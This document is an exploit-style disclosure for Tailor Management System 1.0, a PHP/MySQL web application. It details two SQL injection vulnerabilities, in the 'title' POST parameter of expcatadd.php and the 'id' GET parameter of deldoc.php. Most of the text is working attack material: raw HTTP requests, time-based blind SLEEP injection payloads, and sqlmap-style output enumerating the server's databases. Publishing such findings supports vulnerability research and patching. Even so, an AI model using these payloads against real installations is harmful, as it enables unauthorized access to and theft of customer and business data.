# Exploit Title: Tailor Management System 1.0 Multiple SQL Injection Vulnerabilities
# Google Dork: N/A
# Date: 06.08.2020
# Exploit Author: Mucahit Karadag
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Version: 1.0
# Tested on: Ubuntu Server 14.04.6 LTS
# CVE : N/A

###
# Software Description:
# Tailor Management Software. This Project was created in PHP MySQL using JavaScript, Ajax, 
# Bootstrap, HTML, CSS. The software has mainly covered information of the customers. This 
# tailor software can Manage booking, worker wages, suppliers and customers, and to measure 
#styles and payment history using web application.
#
# Vulnerabilitiy Description:
# Tailor Management System 1.0 web application is vulnerable to
# 2 different SQL injection vulnerabilities in multiple endpoints.
###

##
## [SQL Injection Identified on "title" Parameter]
##

POST /tailor/expcatadd.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Origin: http://TARGET
DNT: 1
Connection: close
Referer: http://TARGET/tailor/expcatadd.php
Cookie: PHPSESSID=f6nbmpss36vdiis4ldb2nl11h6
Upgrade-Insecure-Requests: 1

title=test


# "title" parameter is vulnerable to SQL injection on HTTP POST rquest to /tailor/expcatadd.php endpoint.
Here is PoC:
---
Parameter: title (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=test' AND (SELECT 1577 FROM (SELECT(SLEEP(5)))zVYP) AND 'UKwv'='UKwv
---
[20:34:49] [INFO] fetching database names
[20:34:49] [INFO] fetching number of databases
[20:34:49] [INFO] resumed: 5
[20:34:49] [INFO] resumed: information_schema
[20:34:49] [INFO] resumed: mysql
[20:34:49] [INFO] resumed: performance_schema
[20:34:49] [INFO] resumed: phpmyadmin
[20:34:49] [INFO] resumed: tailor
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] tailor

##
## [SQL Injection Identified on "id" Parameter]
##

GET /tailor/deldoc.php?id=123123123 HTTP/1.1
Host: 12.0.0.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=cfpvj5ehmrgdpl2d1gh5rc3p90
Upgrade-Insecure-Requests: 1


# "id" parameter is vulnerable to SQL injection on HTTP GET rquest to /tailor/deldoc.php?id= endpoint.
Here is PoC:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=123123123' AND (SELECT 8657 FROM (SELECT(SLEEP(5)))bntA) AND 'ovvs'='ovvs
---